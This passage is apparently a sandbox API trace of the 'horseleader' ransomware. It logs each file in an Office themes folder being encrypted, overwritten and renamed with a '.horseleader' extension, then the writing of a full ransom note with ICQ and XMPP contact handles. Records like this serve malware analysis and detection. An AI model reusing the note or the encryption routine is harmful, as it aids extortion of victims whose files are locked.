[0246.322] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.323] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 77 [0246.324] StrStrW (lpFirst="CANYON.ELM", lpSrch=".txt") returned 0x0 [0246.324] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=44745) returned 1 [0246.324] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.327] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.328] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.328] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.328] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.328] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.329] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xec9, lpOverlapped=0x0) returned 1 [0246.329] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff137, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.329] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xec9, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xec9, lpOverlapped=0x0) returned 1 [0246.329] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.329] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.330] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.330] CloseHandle (hObject=0x1a4) returned 1 [0246.330] GetProcessHeap () returned 0x780000 [0246.330] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.330] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM.horseleader") returned 89 [0246.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm.horseleader")) returned 1 [0246.331] GetProcessHeap () returned 0x780000 [0246.331] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.331] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x603362b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1d1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CANYON.INF", cAlternateFileName="")) returned 1 [0246.331] lstrcmpiW (lpString1="CANYON.INF", lpString2="Windows") returned -1 [0246.331] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 77 [0246.331] StrStrIW (lpFirst="CANYON.INF", lpSrch=".horseleader") returned 0x0 [0246.331] lstrcmpW (lpString1="CANYON.INF", lpString2="#Decrypt#.txt") returned 1 [0246.331] lstrcmpW (lpString1="CANYON.INF", lpString2="_uninstalling_.png") returned 1 [0246.331] lstrlenW (lpString=".testttjffg") returned 11 [0246.331] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF", lpSrch=".testttjffg") returned 0x0 [0246.332] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.332] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.333] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 77 [0246.333] StrStrW (lpFirst="CANYON.INF", lpSrch=".txt") returned 0x0 [0246.333] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=465) returned 1 [0246.334] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1d1, lpOverlapped=0x0) returned 1 [0246.336] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.336] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1d1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1d1, lpOverlapped=0x0) returned 1 [0246.337] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.337] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.337] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.337] CloseHandle (hObject=0x1a4) returned 1 [0246.338] GetProcessHeap () returned 0x780000 [0246.338] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.338] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF.horseleader") returned 89 [0246.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.inf.horseleader")) returned 1 [0246.341] GetProcessHeap () returned 0x780000 [0246.341] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.341] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x3b1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.341] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.342] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 78 [0246.342] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.342] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.342] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.342] lstrlenW (lpString=".testttjffg") returned 11 [0246.342] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.342] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.342] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.343] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 78 [0246.343] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.343] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=945) returned 1 [0246.343] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3b1, lpOverlapped=0x0) returned 1 [0246.345] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffc4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.345] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3b1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3b1, lpOverlapped=0x0) returned 1 [0246.345] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.346] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.346] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.346] CloseHandle (hObject=0x1a4) returned 1 [0246.346] GetProcessHeap () returned 0x780000 [0246.346] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.346] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.horseleader") returned 90 [0246.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.horseleader")) returned 1 [0246.347] GetProcessHeap () returned 0x780000 [0246.347] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.347] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7f5f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.347] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.347] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 79 [0246.347] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.347] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.347] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.348] lstrlenW (lpString=".testttjffg") returned 11 [0246.348] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.348] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.348] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.348] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 79 [0246.348] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.348] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=32607) returned 1 [0246.348] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.351] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.351] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.352] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2f5f, lpOverlapped=0x0) returned 1 [0246.352] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd0a1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.352] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2f5f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2f5f, lpOverlapped=0x0) returned 1 [0246.352] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.353] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.353] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.353] CloseHandle (hObject=0x1a4) returned 1 [0246.353] GetProcessHeap () returned 0x780000 [0246.353] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.353] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.horseleader") returned 91 [0246.353] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.horseleader")) returned 1 [0246.354] GetProcessHeap () returned 0x780000 [0246.354] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.354] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7f5f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.354] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.354] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\#Decrypt#.txt") returned 80 [0246.355] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.355] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.355] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.356] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.357] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.357] CloseHandle (hObject=0x158) returned 1 [0246.357] GetProcessHeap () returned 0x780000 [0246.357] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.357] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CAPSULES", cAlternateFileName="")) returned 1 [0246.357] lstrcmpiW (lpString1="CAPSULES", lpString2="Windows") returned -1 [0246.357] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES") returned 68 [0246.357] lstrcmpW (lpString1="CAPSULES", lpString2=".") returned 1 [0246.357] lstrcmpW (lpString1="CAPSULES", lpString2="..") returned 1 [0246.357] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 